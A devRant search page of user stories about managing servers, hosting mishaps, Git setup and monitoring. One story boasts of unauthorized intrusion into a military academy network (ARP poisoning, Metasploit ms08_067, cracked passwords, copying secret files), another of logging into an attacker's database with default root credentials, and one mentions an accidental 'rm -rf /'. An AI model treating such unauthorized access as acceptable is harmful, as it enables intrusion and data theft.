Join devRant
Do all the things like
++ or -- rants, post your own rants, comment on others' rants and build your customized dev avatar
Sign Up
Pipeless API
From the creators of devRant, Pipeless lets you power real-time personalized recommendations and activity feeds using a simple API
Learn More
Search - "managed servers"
-
Funny story about the first time two of my servers got hacked. The fun part is how I noticed it.
So I purchased two new vps's for proxy server goals and thought like 'I can setup fail2ban tomorrow, I'll be fine.'
Next day I wanted to install NginX so I ran the command and it said that port 80 was already in use!
I was sitting there like no that's not possible I didn't install any server software yet. So I thought 'this can't be possible' but I ran 'pidof apache2' just to confirm. It actually returned a PID! It was a barebones Debian install so I was sure it was not installed yet by ME. Checked the auth logs and noticed that an IP address had done a huge brute force attack and managed to gain root access. Simply reinstalled debian and I put fail2ban on it RIGHT AWAY.
Checked about two seconds later if anyone tried to login again (iptables -L and keep in mind that fail2ban's default config needs six failed attempts within I think five minutes to ban an ip) and I already saw that around 8-10 addresses were banned.
Was pretty shaken up but damn I learned my lesson!8 -
[This makes me sound really bad at first, please read the whole thing]
Back when I first started freelancing I worked for a client who ran a game server hosting company. My job was to improve their system for updating game servers. This was one of my first clients and I didn't dare to question the fact that he was getting me to work on the production environment as they didn't have a development one setup. I came to regret that decision when out of no where during the first test, files just start deleting. I panicked as one would and tried to stop the webserver it was running on but oh no, he hasn't given me access to any of that. I thought well shit, I might as well see where I fucked up since it was midnight for him and I wasn't able to get a hold of him. I looked at every single line hundreds of times trying to see why it would have started deleting files. I found no cause. Exhausted, (This was 6am by this point) I pretty much passed out. I woke up around 5 hours later with my face on my keyboard (I know you've all done that) only to see a good 30 messages from the client screaming at me. It turns out that during that time every single client's game server had been deleted. Before responding and begging for forgiveness, I decided to take another crack at finding the root of the problem. It wasn't my fault. I had found the cause! It turns out a previous programmer had a script that would run "rm -rf" + (insert file name here) on the old server files, only he had fucked up the line and it would run "rm -rf /". I have never felt more relieved in my life. This script had been disabled by the original programmer but the client had set it to run again so that I could remake the system. Now, I was never told about this specific script as it was for a game they didn't host anymore.
I realise this is getting very long so I'll speed it up a bit.
He didn't want to take the blame and said I added the code and it was all my fault. He told me I could be on live chat support for 3 months at his company or pay $10,000. Out of all of this I had at least made sure to document what I was doing and backup every single file before I touched them which managed to save my ass when it came to him threatening legal action. I showed him my proof which resulted in him trying to guilt trip me to work for him for free as he had lost about 80% of his clients. By this point I had been abused constantly for 4 weeks by this son of a bitch. As I was underage he had said that if we went to court he'd take my parents house and make them live on the street. So how does one respond? A simple "Fuck off you cunt" and a block.
That was over 8 years ago and I haven't heard from him since.
If you've made it this far, congrats, you deserve a cookie!6 -
Navy story continued.
And continuing from the arp poisoning and boredom, I started scanning the network...
So I found plenty of WinXP computers, even some Win2k servers (I shit you not, the year was 201X) I decided to play around with merasploit a bit. I mean, this had to be a secure net, right?
Like hell it was.
Among the select douchebags I arp poisoned was a senior officer that had a VERY high idea for himself, and also believed he was tech-savvy. Now that, is a combination that is the red cloth for assholes like me. But I had to be more careful, as news of the network outage leaked, and rumours of "that guy" went amok, but because the whole sysadmin thing was on the shoulders of one guy, none could track it to me in explicit way. Not that i cared, actually, when I am pissed I act with all the subtleness of an atom bomb on steroids.
So, after some scanning and arp poisoning (changing the source MAC address this time) I said...
"Let's try this common exploit, it supposedly shouldn't work, there have been notifications about it, I've read them." Oh boy, was I in for a treat. 12 meterpreter sessions. FUCKING 12. The academy's online printer had no authentication, so I took the liberty of printing a few pages of ASCII jolly rogers (cute stuff, I know, but I was still in ITSec puberty) and decided to fuck around with the other PCs. One thing I found out is that some professors' PCs had the extreme password of 1234. Serious security, that was. Had I known earlier, I could have skipped a TON of pointless memorising...
Anyway, I was running amok the entire network, the sysad never had a chance on that, and he seemed preoccupied with EVERYTHING ELSE besides monitoring the net, like fixing (replacing) the keyboard for the commander's secretary, so...
BTW, most PCs had antivirus, but SO out of date that I didn't even need to encode the payload or do any other trick. An LDAP server was open, and the hashed admin password was the name of his wife. Go figure.
I looked at a WinXP laptop with a weird name, and fired my trusty ms08_067 on it. Passowrd: "aaw". I seriously thought that Ophcrack was broken, but I confirmed it. WTF? I started looking into the files... nothing too suspicious... wait a min, this guy is supposed to work, why his browser is showing porn?
Looking at the ""Deleted"" files (hah!) I fount a TON of documents with "SECRET" in them. Curious...
Decided to download everything, like the asshole I am, and restart his PC, AND to leave him with another desktop wallpaper and a text message. Thinking that he took the hint, I told the sysadmin about the vulnerable PCs and went to class...
In the middle of the class (I think it was anti-air warfare or anti-submarine warfare) the sysad burst through the door shouting "Stop it, that's the second-in-command's PC!".
Stunned silence. Even the professor (who was an officer). God, that was awkward. So, to make things MORE awkward (like the asshole I am) I burned every document to a DVD and the next day I took the sysad and went to the second-in-command of the academy.
Surprisingly he took the whole thing in quite the easygoing fashion. I half-expected court martial or at least a good yelling, but no. Anyway, after our conversation I cornered the sysad and barraged him with some tons of security holes, needed upgrades and settings etc. I still don't know if he managed to patch everything (I left him a detailed report) because, as I've written before, budget constraints in the military are the stuff of nightmares. Still, after that, oddly, most people wouldn't even talk to me.
God, that was a nice period of my life, not having to pretend to be interested about sports and TV shows. It would be almost like a story from highschool (if our highschool had such things as a network back then - yes, I am old).
Your stories?8 -
In this day and age, what's my fucking excuse for not using a vpn full-time on my phone as well (next to my laptop)?
I do way more personal stuff on my phone anyways and add to that that I've got access to at least three self managed VPN servers...
Yup, going full VPN from now on.29 -
!!rant
When I worked at a previous job, they only gave out decent titles (and salaries) to upper management. Everyone else... well... I was the Domain/Sysadmin, responsible for the domain and both DCs, upgrading the physical network (plus recabling it: the MDF was a *disaster*), as well as all backups, migrations, printers, servers, and workstations/lappys in the building, plus pushing software, antivirus, updates, security policies, etc. I had complete access to everything, and ofc was responsible for everything. Nothing on my network caused anyone (else) any trouble except one particular printer I wasn't able to replace. Also, nothing new appeared on my network without me noticing and tracking it down.
But my official title? "IT Assistant".
I made $11/hr.
Worth it? Take a flying leap into an overflowing outhouse during the height of a Vegas summer if you even begin to think so.
I eventually managed to switch to a developer position, and (after several attempts) got a ~$5/hr raise. The girl they replaced me with in IT with some ditz who had never installed an OS before, didn't know what the BIOS was, and couldn't figure out why a monitor... plugged into itself... wasn't working. Things went downhill from there.10 -
Here's the story of my first month at CERN :) But first, a little premise...
Before arriving, I expected to be scared, alone and unguided in most of my experiences: after all I was a simple 19 year old about to leave home and friends for 3 years heading out in the world with zero experience on stuff like banking, taxes.. let alone working in a huge environment! The impostor syndrome was at an all time high on that front.
Then, I had the luck and pleasure to find an extremely competent and helpful plethora of people, ranging from my team to other CERNies (yes, that how we're called :P) who took me under their wing and introduced me to all the key aspects of living the place. When the initial stress finally soothed down thanks to this, I finally started to manage focusing more and more on my work, by following day-by-day my teammates who taught me the core aspects of the system and the many projects that are in progress during Long Shutdown 2. Within a couple weeks, I already managed to grasp various concepts that got me quickly on track, and now I managed to develop and integrate new temperature monitoring scripts into a system checking on hundreds of Single Board Computer-based servers :) It's a real rollercoaster of learning and applying under all fronts and so far I'm not regretting my choice of departing.
Luckily I've also discovered I'm pretty efficient and good at my job, which surely boosts my morale :D
Keep you updated as usual!11 -
An important message:
PrOpErLy managing servers is HARD.
I get pissed off at customers with ZERO server knowledge who think they can manage their VPS. “Just get a control panel and a VPS” from some flashy provider that makes server management look way too easy.. Clicking around in their fancy control panel, until:
- they need help with their *self-managed* VPS;
- their email ends up in spam;
- they suffer from performance issues;
- they need to restore a backup;
- something breaks, because YES, things break
Way too little people are able to answer:
- when and how do you make backups?
- how do you monitor your servers and which services?
- how do you keep track of trend analysis?
Then I come by with necessary software. SNMP for trend analysis, Graphite for infrastructure health, Sensu for monitoring, Kibana, Ansible for configuration management..
Things that servers need but that customers have never even heard of.. because they can do everything in their control panel..
Until they come crying to me because it broke and they don’t even know how to get into SSH.
I think the ones to blame are VPS providers that tell the tale of how easy it is to install a control panel and never look at your server again.
Customers become responsible for something *business-critical*! Yet they don’t know how it works.6 -
So probably about a decade ago at this point I was working for free for a friend's start-up hosting company. He had rented out a high-end server in some data center and sold out virtualized chunks to clients.
This is back when you had only a few options for running virtual servers, but the market was taking off like a bat out of hell. In our case, we used User-Mode Linux (UML).
UML is essentially a kernel hack that lets you run the kernel in user space. That alone helps keep things separate or jailed. I'm pretty sure some of you can shed more light on it, but that's as I understood it at the time and I wasn't too shabby at hacking the kernel when we'd have driver issues.
Anyway, one of the ways my friend would on-board someone was to generate a new disk image file, mount it, and then chroot to that mount path. He'd basically use a stock image to do this and then wipe it out before putting it live.
I'm not sure exactly what he was doing at the time, but I got a panicked message on New Years Day saying that he had deleted everything. By everything, he had done an rm -fr /home as root on what he had thought was the root of a drive image.
It wasn't an image. It was the host server.
In the stoke of a single command, all user data was lost. We were pretty much screwed, but I have a knack for not giving up - so I spent a ton of time investigating linux file recovery.
Fun fact about UML - since the kernel runs in user space as a regular ol' process, anything it opens is attached to that process. I had noticed that while the files were "gone", I could still see disk usage. I ended up finding the images attached to their file pointers associated with each running kernel - and thankfully all customers were running at the time.
The next part was crazy, and I still think is crazy. I don't remember the command, but I had to essentially copy the image from the referenced path into a new image file, then shutdown the kernel and power it back on from the new image. We had configs all set aside, so that was easy. When it finally worked I was floored.
Rinse and repeat, I managed to drag every last missing bit out of /proc - with the only side effect being that all MySQL databases needed to be cleaned up.3 -
!rant/story
I feel so great after switching from Windows 10 to (GNU/(REEE))Linux Kubuntu.
No annoying and redundant programs that are not quitable anymore.
It is like having a rooted phone. I am the god and not Microshit.
I am free. It feels so relaxing.
Sure, while setting this new system up, I broke a lot of things (even with years of preknowledge on linux servers), but I finally managed to finish it.19 -
I've accomplished something I thought I'd never do.
I convinced my boss to switch from SVN to Git. (before SVN we've even been using CVS if someone remembers)
Only requirement: it needs to stay in house and I'm the one setting up the server, writing documentation and teach everyone how to use it.
What? Why should I setup the server? Don't we have someone whose job it is to... OK ok... I'll do it.
So after some painstaking arguments with the guy whose job it should have been to do that, I've managed to install a virtual machine running Gitlab.
Long story short: I've just found out about the joys of mail configuration to send E-Mails to established mail providers. Every... single... one of them has a different problem with the way the mails are sent.
Fml
I think I'm going to ask that guy again to use our mail servers SMTP. There should be a possibility to use my gitlabs domain for that somehow.
Really looking forward to Monday. Ugh... -
Once upon a time, one or two jobs ago, a really awesome engineer specced out a distributed search application in response to a business need. This company was managed pretty oldschool and required a ton of paperwork and approvals.
The engineer spent many weeks running tests and optimizing the hell out of this app cluster. It flew, and he had the data to prove it could handle production workloads (think hundreds of terabytes of data being processed every single day)
Part of the way he achieved this was having RAID0 on all of the servers to maximize I/O throughput. He didn't care much about data loss, since the application itself was fault tolerant on a much more granular level.
Management, hearing about this, absolutely flipped their shit and demanded RAID6 instead. This despite the conclusive data that the engineer had that proved RAID6 couldn't keep up.
He more or less got told to STFU.
Even this despite the fact that a RAID restripe would actually take many times longer than rebuilding the failed node from scratch (a process that took about 30 minutes by hand, and could probably be automated to be done in less than five), causing a longer exposure to actual data loss throughout the length of the days-long array rebuild time.
The ill-thought-out requirement added about 50% to the cost of the project (*many* more hard drives now required), beyond the original budget, and the subsequent bureaucratic wrangling resulted in a late product launch.
6 months or so later, after real customers were using this product, the app was buckling under around half of its expected workload. A friend of the engineer suggested to management to try RAID0. Sure enough, that resolved the I/O bottleneck.
This rage-inducing story has a happy ending, though! Said engineer left the company not long after this incident, citing it as a reason for his departure. He was immediately hired by another company, making integer multiples of his prior salary.
The product the company botched the launch of by ignoring his spec? It died a few months later. Maybe the poor customer experience was to blame? Maybe the late launch? Maybe it was another reason entirely.
Either way, millions of dollars of hardware now sat fallow. This was a black eye on the company all the way up to the C-level.
tl;dr: Listen to your engineers. You hired them for their expertise.5 -
I really wanna share this with you guys.
We have a couple of physical servers (yeah, I know) provided by a company owned by a friend of my boss. One of them, which I'll refer to as S1, hosted a couple of websites based on Drupal 7... Long story short, every php file got compromised after someone used a vulnerability within D7's core to inject malicious code. Whatver, wasn't a project of mine, and no one bothered to do anything about it... The client was even happy about not doing anything about it. We did stop making backups of such websites however, to avoid spreading the damage (right?). So, no one cared about this for months!
But last monday? The physical server was offline. I powered it on again via its web management interface... Dead after less than an hour. No backups. Oh well, I guess I couls keep powering it on to check what's wrong with it and attempt to fix it...
That's when I've learned how the web management interface works: power on/reboot requests prompted actual workers to reach the physical server and press the power on/reboot buttons.
That took a while to sink in. I mean, ok, theu are physical servers... But aren't they managed anyhow? They are just... Whatever. Rebooting over and over wasn't the solution, so I asked if they could move the HDD to another of our servers... The answer was it required to buy a "server installation" package. In short, we'd have had to buy a new physical server, or renew the subscription of one we already owned for 6 months.
So... I've literally spent the rest of the day bothering their emoloyeea to reboot S1, until I've reached the "daily reboot reauests limit" (which amounts to 3 reauests. seriously), whicj magically opened a support ticket where a random guy advised to stop using VNC as "the server was responsive" and offeres to help me with the command line.
Fiiine, I sort of appreciate it. My next message has been a kernel log which shows how the OS dying out was due to physical components becoming unavailable after a while, and how S1 lacked a VNC server, being accessible only via ssh. So, the daily reboot limit was removes for S1. Yay.
...What to do though? S1 was down, we had no backups, and asking for manual rebooting every time was slow as Hell. ....Then I went insane. I asked for 1 more reboot. su. crontab -e. */15 * * * * /sbin/shutdown -r +5. while true; do; rsync --timeout=20 --append S1:/stuff .; sleep 60; done.
It worked. We have now again access to 4 hacked, shitty Drupal 7 websites. My boss stopped shouting. I can get back to my own projects.
Apparently, those D7 websites got back online too, still with malicious php code within them. Well, not my problem (for now).
Meanwhile, S1 is still rebooting.3 -
We just got into a malicious bots database with root access.
So guard duty gave us some warnings for our tableau server, after investigating we found an ip that was spamming us trying all sorts. After trying some stuff we managed to access their MySQL database, root root logged us in. Anyway the database we just broke into seems to have schemas for not only the bot but also a few Chinese gambling websites. There are lots of payment details on here.
Big question, who do we report this to, and what's the best way to do so anonymously? I'm assuming the malicious bot has just hyjacked the server for these gambling sites so we won't touch those but dropping the schema the bot is using is also viable. However it has a list of other ips, trying those we found more compromised servers which we could also log in to with root root.
This is kinda ongoing, writing this as my coworker is digging through this more.11 -
Working with DigitalOcean boxes for so long has spoiled me.
I went to setup something on my home server today, and couldn't figure out what I was doing wrong for like 30 minutes...
Until I realized that I never forwarded port 80.
*sigh.1 -
I installed my first Windows servers in AWS today. And now #awsdown is trending on Twitter. I finally managed to break the internet 😳1
-
4th grade. My parents left for the night and got a babysitter for me and my younger siblings. The babysitter showed me a game she likes in IE. You could make an account, raise a digital pet, a "neopet," play flash games for points to buy items from other users who listed them in their own stores that had custom css/html, including bg music. This was the first time I had really witnessed what the web could look like. Animated tiled gif bgs really amazed me so I took to google with which I discovered sites where one could copy css and html snippets for themes. I stored each new html tag I discovered via w3cschools.com in a powerpoint where the snippets I found were pasted somewhere randomly in the ppt. From there I learned html, CSS, and a billion other things. To date I've made websites, apps with several langs in win/Linux/osx/Android (but not ios yet). I've managed servers, and databases , and DNS records. I've in even ran website with 100k requests a day.3
-
All the Linux servers I manage:
Uptime 300+ days
All the Linux server I manage inside hyper-v managed by our it:
Uptime max 7 days...
Wtf? Do you really have to restart the host machine once a week?8 -
I took like 3 years to my company to get this huge-ass client to ask us to remake their website (the client is already our client for other purposes).
The old website was hosted on their local machine, behind a proxy that was there for other 30 website servers.
The old website took like 30-40 seconds to load on a browser and had a google score of 3-6/100.
We made the new website in wordpress, since it was basically a blog and managed all of the older links to redirect to the new pages so that SEO wouldn't get affected.
We then asked the previous developers to let their domain redirect to the new one (it was like example.com => ex.example.com and now it's just example.com, so we needed them to make ex.example.com redirect to example.com).
What they did was making a redirection to the 404 page of the new website, making everything go to fuck itself.
Damn this might be the first time I despise other developers, but this move was fucking awful.
I mean, I get it, we stole your big client, but it's not our fault if we made the google score go up to 90/100 in a week just by changing server and CMS.11 -
I am at a hotel and these fuckers are blocking outbound connections to port 22. They are also blocking access to any websites mentioning proxy or vpn, seriously fuck them. I managed to get a VNC connection open to one of my servers and I am now trying to set up a VPN tunnel to my servers so I can fucking do my work. >:-(6
-
TL;DR Dear boss, firstly, you always get someone to review anything important done by a fucking intern.
Secondly, you do not give access to your fucking client's production server to an intern.
Thirdly, you don't ask your fucking intern to test the intern's work that has not been reviewed by anyone directly on your client's fucking production server.
Last week, the boss and one of the lead devs (the only guy with some serious knowledge about systems and networking) decided to give me (an intern who barely has any work experience) the task of fixing or finding an alternate solution to allowing their support team access to their client machines. Currently they used a reverse SSH tunnel and an intermediary VH but for some reason, that was very unreliable in terms of availability. I suggested using OpenVPN and explained how it would work. Seemed to be a far better idea and they accepted. After several days of working through documentations and guides and everything, I figured out how OpenVPN works and managed to deploy a TEST server and successfully test remote access using two VMs. On seeing my tests, the boss told me that he wanted to test it on the client network. I agreed. Today he comes to me and he tells me to prepare testing for tomorrow and that the client technician is going to give me access to one of their boxes. And then he adds, "It's a working prod server. We'll see if we can make it work on that" and left. I gaped at him for a while and asked another dev guy in the room if what I heard was right. He confirmed. Turns out, the lead dev and the boss's son (who also works here) had had a huge argument since morning on the same issue and finally the dev guy had washed it off his hands and declared that if anything goes wrong from testing it on production, it's entirely the boss's own fault. That's when the boss stepped in and approached me. I ran back to his office and began to explain why prod servers don't top the list of things you can fuck around with. But he simply silenced me saying, "What can go wrong?" and added, "You shouldn't stay still. You should keep moving". Okay, like firstly what the fuck and secondly, what the fuck?.
Even though OpenVPN client is not the scariest thing to install, tomorrow's going to be fun.4 -
!coding
I used to be a sysadmin, which meant I was in charge of quarterly server patching. My team managed about 2500 servers, running various flavors of linux and legacy unix. The vast majority(95% or more) ran Linux(SLES). Our maintenance window was always in the overnight-- 10pm to 6am --so the stroke of 10pm would be a massive cascade of patching commands sent to hundreds of servers.
Before I was brought into the process, it made use of the automation product we were tasked by mgmt to use: Bigfix. It's a real piece of shit. Though we had 2500 or so servers, this environment was dominated by windows. All our vcenter servers ran it, and more importantly, our bigfix nodes were all windows machines. That meant that while we're trying to patch, the bigfix servers would get patched by the windows team. This would cause lots of failed and timed out patching, because the windows admins never quite understood that taking down the automation infrastructure would cause problems.
As such, I got tired of depending on a bunch of button-pushing checkbox-clickers who didn't know shit about shit, so I started writing an ssh-wrapped patching system. By the time I left for my current job, patching had been reduced to a single command to initiate each group's patching and reboots, and an easy check to see when servers come back up. So usually, the way it worked out was that I would send patching orders to 750 machines or so, and within about 5 minutes, they would all be done patching, and within another 20 minutes all the ones that required rebooting but about 5 would be done rebooting.
The "all-nighter" which happened every time was waiting for oracle servers to run timed fscks against a dozen or so large filesystems per server, because they were all on ext3/4, which eats complete shit. Then, several hours later, as they finished, I would have to call the DBAs to tell them to validate their shitty servers.3 -
About slightly more than a year ago I started volunteering at the local general students committee. They desperately searched for someone playing the role of both political head of division as well as the system administrator, for around half a year before I took the job.
When I started the data center was mostly abandoned with most of the computational power and resources just laying around unused. They already ran some kvm-hosts with around 6 virtual machines, including a cloud service, internally used shared storage, a user directory and also 10 workstations and a WiFi-Network. Everything except one virtual machine ran on GNU/Linux-systems and was built on open source technology. The administration was done through shared passwords, bash-scripts and instructions in an extensive MediaWiki instance.
My introduction into this whole eco-system was basically this:
"Ever did something with linux before? Here you have the logins - have fun. Oh, and please don't break stuff. Thank you!"
Since I had only managed a small personal server before and learned stuff about networking, it-sec and administration only from courses in university I quickly shaped a small team eager to build great things which would bring in the knowledge necessary to create something awesome. We had a lot of fun diving into modern technologies, discussing the future of this infrastructure and simply try out and fail hard while implementing those ideas.
Today, a year and a half later, we look at around 40 virtual machines spiced with a lot of magic. We host several internal and external services like cloud, chat, ticket-system, websites, blog, notepad, DNS, DHCP, VPN, firewall, confluence, freifunk (free network mesh), ubuntu mirror etc. Everything is managed through a central puppet-configuration infrastructure. Changes in configuration are deployed in minutes across all servers. We utilize docker for application deployment and gitlab for code management. We provide incremental, distributed backups, a central database and a distributed network across the campus. We created a desktop workstation environment based on Ubuntu Server for deployment on bare-metal machines through the foreman project. Almost everything free and open source.
The whole system now is easily configurable, allows updating, maintenance and deployment of old and new services. We reached our main goal for this year which was the creation of a documented environment which is maintainable by one administrator.
Although we did this in our free-time without any payment it was a great year with a lot of experience which pays off now. -
A little update after yesterday's catastrophe:
No catastrophe today (so far). Managed to clear some space on the servers, and the backup ran correctly overnight.
Also...and I'm still checking this... but I think I've just received a pay rise.
wait....is today...a good day?2 -
Not really a rant and not very random. More like a very short story.
So I didn't write any rant regarding the whole Microsoft GitHub topic. I don't like to judge stuff quickly. I participated in few threads though.
Another thing is I also don't use GitHub very much apart from giving 🌟 to repos as a bookmark. Have one hobby project there. That's all. So I don't worry that much. I'm that selfish and self concerned. :3
I was first introduced to version control system by learning how to use tortoisesvn around 2008. We had a group project and one of the guys was an experienced and amazing programmer unlike the rest of us. He was doing commercial projects while we were at our 1st and 2nd year. Uni had svn repo server. He taught us about tortoisesvn. He also had Basecamp and taught us how to use it as well. So that's how I learned the benefits of using versioning tools and project management tools. On side note, our uni didn't teach any of those in detail :3
After that project, I was hooked to use versioning tools. So until school kicked me out, I was able to use their svn server. When I was on my own, I had to ask Google for help. I found a new world. There are still free svn services that I can use with certain limited functions. That's not the new world; I found people saying how git is better than svn in various ways. It was around 2010,2011.
At first I was a bit reluctant to touch git because of all the commands in terminal approach. But then I found that there is tortoisegit. I still thank tortoisesvn creator for that. I'm a sucker for GUI tools. So then I also have to pick which git servers to use. Hell yeah, self hosted gitlab is the way to go man. Well that's what the internet said. So I listened. I got it up and running after numerous trial and error. I used it briefly. Then I came back to my country on 2012-2013; the land of kilobytes per minute (yes not second, minute).
My country's internet was improved only after 2016. So from 2013 to 2016, I did my best not to rely on internet. I wasn't able to afford a server at my less than 10 people, 12ft*50ft office. So I had to find alternative to gitlab which preferably run on windows. Found bonobo and it was alright. It worked. Well had crazy moments here and there when the PC running Bonobo got virus and stuff. But we managed. We survived. Then finally multi national Telecom corporates came to our country.
We got cheaper and faster mobile data, broadband and fiber plans. Finally I can visit pornhub ... sorry github. Github is good. I like it. But that doesn't mean I should share my ugly mutated projects to the rest of the world. I could keep using Bonobo but it has risks. So I had to think for an alternative. I remembered that gitlab didn't have cloud hosting service when I checked them out in the past. So I just looked into Bitbucket and happy with their free plans of 5 users and unlimited private repos. I am very very cheap and broke.
That's why I said I don't really care that much about the whole M$GitHub topic at the beginning. However due to that topic, I have visited GitLab website again and found out they have cloud hosting now and their free plan is unlimited users and unlimited repos. So hell yeah. Sorry BB. I am gonna move to cheaper and wider land.
TL;DR : I am gonna move to GitLab because of their free plan.4 -
Today was not my sharpest day but managed to sit eight hours on this chair with a laptop on my arm leaning. It's very comfortable.
I made a regex interpreter. Three versions, the first one was nicely programmed and functional but found out that it was 16 times slower than the clib one (at least!). Then i found out how extremely fast the clib one was and found out that the compiling to bytecode what they do is extremely effective. So, i've wrote my one bytecode compiler that is faster than theirs. So, the second version was born. After abusing that thing to find out what kinda speeds i could get out of it, it became very unmaintainable, beyond resque. So i made third version, this one is very performant. It supports [abc]{3} (three times dupplicating group) for example. It supports 0-9 and a-z that converts to 'd' and 'a' (shorter for speed). It converts [a0-9a-z]]{3} to [lada][lada][lada]. The bytecode is not smaller many times than source, but not having to think, suits the interpreter very well. It's blazing fast.
I wish I could smth like this for a living. Develop a language for a living or socket servers. Tired of python (great language, but boring).
Thanks for listening to my tedtalk6 -
Someone's guts will be torn out tomorrow and put up on a nice clean razor barbed wire ...
I was wondering what the fucking fuck messed up my brain - till I realized that some dev mixed up the timezone on one of our servers. Dunno how the dev managed it - but the end result was not funny.
Due to the difference in time strings the newer backup had an older timestamp - and vice versa.
Which - when you want to do mass clean up and migration - is a very fucked up thing.
I had to manually check dozens of backups to make sure I got the right ones...
-.- knife goes in, gut goes out. Thx Bart Simpson.8 -
It was in old days when I was working in java and windows systems.
Java and different log4j versions across dependencies caused system not working only on production server.
Turned out some of libraries got log4j embedded and conflicted with other log4j.
It worked in all computers except production one.
Actually that was my main reason to switch my career to python after that dependency hell.
Another one was windows server 2008 tcp connection limit set to 200 or something.
We needed to change registry to get our servers working. After this case we finally managed to convince people to switch to linux.
Anyway any non standard error when you got multiple layers communicate with each other is hard, practice make it easier to solve those problems as your success moment comes faster.4 -
Hello, world!
Okay, guys and gals... I need your creative minds. I need a concept for sort of a property manager for my game.. I have an idea of my own, feel free to tear it apart or throw it out the window.
So basically.. You'll no longer have one Computer System (and you wont instantly hit the login screen for that System on startup) Instead, you'll have a lot of things. They will probably only be represented using text and menu's (likely no 3D or 2D environments or anything.. Though, a setup like News Tycoon would be epic, but I think that would be too much for this game.) You'll basically start off with a small space (probably a basement) with x amount of free space. In that space, you'll need to add things like a desk, chair, and a laptop, or tower + monitor. You can also buy things like server rigs with a ton of space, but those are pricy and bulky. Each item costs X amount and takes up X amount of space. Also, you'll need a desk for a monitor (or multiples..) and other things.. (Like your rubber duck collection ;P JK) You can also rent and manage servers. (renting is more exspensive in the long run, but things on your server are not on your property. But, if you own a server on your property you can rent space to to NPCs) As well as manage your devices, properties, stocks, etc..
Also, there will be in-game time. Depending on how "comfortable" you are will determine how long you can stay up in a day. In-game events will take place later on at specific times so staying up (or not..) will need to be managed well. Especially if you're being targeted by a rival (NPC) hacker.7 -
My another attempt to write something in rust and I wanted to try tauri as it’s promising competition to electron.
Why use tauri not electron?
Cause in tauri you can write rust plugins that you can interact with directly from javascript without stupid http servers, mangling code and stuff.
From javascript point you only call one method and pass object with arguments into it.
So it took me entire weekend to create draft plugin to interact with sqlite database.
Documentation of tauri is inconsistent. I understand that cause it’s young project and plugins architecture changed frequently.
Moreover my knowledge of rust is near to zero. But overall it was worth it. I like what I achieved.
I can pass sql query and execute it inside mutex guarded singleton. Like I said before I like it cause I can call my plugin directly from javascript.
I know I wasn’t fancy with my implementation. I just created file database connection from json configuration and managed to receive string sql statements. I just print results with rust to console for now.
I will add sending back results later this week.
For me tauri is already better then electron cause code is clear and there is no workaround ( except singleton with connection - cause of limitations of my rust knowledge ).
Live long tauri and fuck you electron.
https://tauri.studio/en/
if you’re interested.2 -
Sometime last year I had an internship at a small company.
Test servers weren't a thing, and after local testing, it would go to production with a backup of the files that we would put back as soon as we notice something was broken or off.
We used symfony and sonata admin was part of the bundle.
One day, boss asks me to show all the items in a table on the admin page instead of 30 rows.
Me being good guy intern say "sure no problem" so after finding the magic number, I set it to 0 instead of 30.
I gave my work reviewed by my supervisor (senior dev there) and he approved it.
I try to upload the file over FTP. No permissions.
Ask the other dev what it's about, his response: "no idea"
So he tries, fails and decides to try SSH.
Somehow, after fiddling for 20 minutes with ssh, we managed to upload the file.
As soon as we did we hear a scream from the boss's office, we refresh the site, and no matter what page we went to, all we saw was white and the logo of the company in the top left corner.
So this time, we fiddled around with ssh to restore the file for 20 minutes.
Finally succeed all goed back to normal.
A little while later, we call a meeting with the bosses and ask to rewrite the website, BAM, we get approval.
We said "two weeks tops", well that lasted 3 months.
In the end bosses are Uber happy with the work and everything ended well.
Also, development speed has multiplied. -
Today i chartered new realms for me.
I created a new hyper-v vm on the company windows servers and added a 5th instance to it, but instead of running another windows server i installed an ubuntu 18.04 (cause i am a bit familiar with debian from my raspberry pi)
we have two servers, one which runs the 4 vms and a replica. I first had the new vm on the main server but it occured me to move it instead to the unusued replica machine. That kinda worked..i did a planned failover but the main server isnt configured to be the replica..and even when activating that it didnt work. This is weird.
For the moment i ignored that and proceeded to install nginx, mariadb and php 7.2..basically the lemp stack. I managed to setup nginx and a static ip adress for the machine (which was different from how i remembered it to do (in 18.04 its not done with the network conf but a yaml file).
in the end i added two different virtual servers, one for actual use and one for dev stuff (with phpmyadmin running for instance), listening on port 80 and some random other port.
as a test i brought a mediawiki onto the Port 80 server and it worked.
on monday i have to figure out how to implement the wildcard certificate i have for our company domain (internal dns simply routes intranet.company.com to the local server vm)
i am mighty proud cause all my experience with linux was with a raspberry pi so far and i am fairly certain i did it right and without shortcuts this time. (unlike my raspberry experience)
just wanted to share
(i also sweated a lot of blood when editing the hyper v settings as i did not set up the server in the first place)
((i also installed xrdp and a mate desktop, but i am less proud of that, but sometimes seeing folders graphically helps me)) -
Glad to be back to some IRC servers that managed to not die off and ZNC bouncer got so much neat default and external plugins now, for example you can get push notifs if you want: https://github.com/jreese/znc-push1
-
I have worked in a hosting or sysadmin role for at least 8 years out of my career and managed thousands of servers in very large environments. My team has been shopping around for a new hosting company and has yet to include me on the calls / advisement. The people shopping for a provider... Zero hosting experience. Zero sysadmin experience. Zero applicable experience. Not IT people, not technical. Well I guess it's job security for when things blow up in our faces that I'll need to fix it.1
-
Using grafana together with tinc+promotheus, has been a blast.
Initially I wanted to get into ELK with Kibana and all that, but that required 8G of ram, the instructions to get it running in the open source "mode" was nearly non-existent, together with all the ready docker compose stacks out there simply not working or the images being broken.
I'm sure I could've managed around most of those issues, but the fact it is as hungry as gitlab, made it a literal no-go for the usual server resources my clients host or my own scaled down server recently.
Thankfully I remembered that there's grafana and me having experimented some time ago with tinc, so I can have very lightweight beat'esque prometheus agents deployed listening on tinc local net only, with the typical nginx auth and some whitelists to all of the servers I host and all those of my clients.
The dashboard creation was especially great in grafana (tbf promotheus does actually most of it), literally what I always wanted out of those "complicated" solutions, that do it all, but have no proper query language, complex documentation, heavy collectors with no properly named data points, expensive resource runtimes, ..
with grafana I can just easily put dashboards into folders, create users to look only at certain stats or even dashboards (opened up some interesting contracts actually, because now I can also offer proper monitoring for all things delivered), easily drag and drop around stuff to fit more information (most others fix you to a small 3x2 grid, a too big grid for a TV or simply non resizable tiles, making that one counter take up an entire row) and resize to my hearts desire
tinc of course allows me to easily create private networks that are resistant to failure across any region and the routing is done for me, so I don't have to run around it all that much either
P.S: a damn tiny fly went into one of my now 4 monitors and died right in the middle, because I thought it's just some dirt and I pressed it in while trying to wipe it off, so that monitor now serves as the top most on a vesa mount5 -
This is an actual transcript...
Since it's way too long for the normal 5000 characters, hence splitting it up...
Infra Guy: mr Dev, could you please give some rational for update of jjb?
Dev: sparse checkout support is missing
